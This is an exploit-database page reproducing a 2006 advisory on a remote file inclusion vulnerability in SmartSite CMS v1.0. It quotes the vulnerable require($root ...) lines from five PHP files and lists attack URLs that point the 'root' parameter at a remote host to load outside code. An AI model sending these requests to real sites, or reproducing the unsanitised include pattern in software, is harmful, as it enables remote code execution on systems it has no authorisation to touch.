Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-98 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | High | Remote | 2006-07-13 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
smartsite cms v1.0 Remote File include ------------------------------------------------- Discovered By CrAsh_oVeR_rIdE Arabian Security Team ------------------------------------------------- site of script:www.smartsitecms.net ------------------------------------------------- Vulnerable: smartsite cms v1.0 ------------------------------------------------- vulnerable code: ---------------------- 1-in comment.php : require($root . "include/inc_foot.php"); --------------------------------------- 2-in /admin/comedit.php : else { require('../include/inc_accessfail.php'); } ?> </div> </div> <?php } else { require($root . "include/inc_adminfail.php"); } --------------------------------------- 3-in /admin/test.php : require($root . "include/inc_adminfooter.php"); --------------------------------------- 4-in /admin/index.php : require($root . "admin/include/inc_adminfooter.php"); --------------------------------------- 5-in /admin/include/inc_adminfoot.php: require($root . "include/inc_footer.php"); --------------------------------------- $root parameter File include ------------------------------------------------------------------------ ----------------------------------------------------------------- vulnerable files : -------------------- comment.php /admin/test.php /admin/index.php /admin/include/inc_adminfoot.php /admin/comedit.php ------------------------------------------------- example: www.example.com/(path)/comment.php?root=http://evilcode.txt? www.example.com/(path)/admin/test.php?root=http://evilcode.txt? www.example.com/(path)/admin/index.php?root=http://evilcode.txt??root=ht tp://evilcode.txt? www.example.com/(path)/admin/include/inc_adminfoot.php?root=http://evilc ode.txt? www.example.com/(path)/admin/comedit.php?root=http://evilcode.txt? -------------------------------------------------- Discovered By CrAsh_oVeR_rIdE E-mail:KARKOR23 (at) hotmail (dot) com [email concealed] Site:www.lezr.com Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALM OKAN3 AND ALL LEZR.COM Member
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.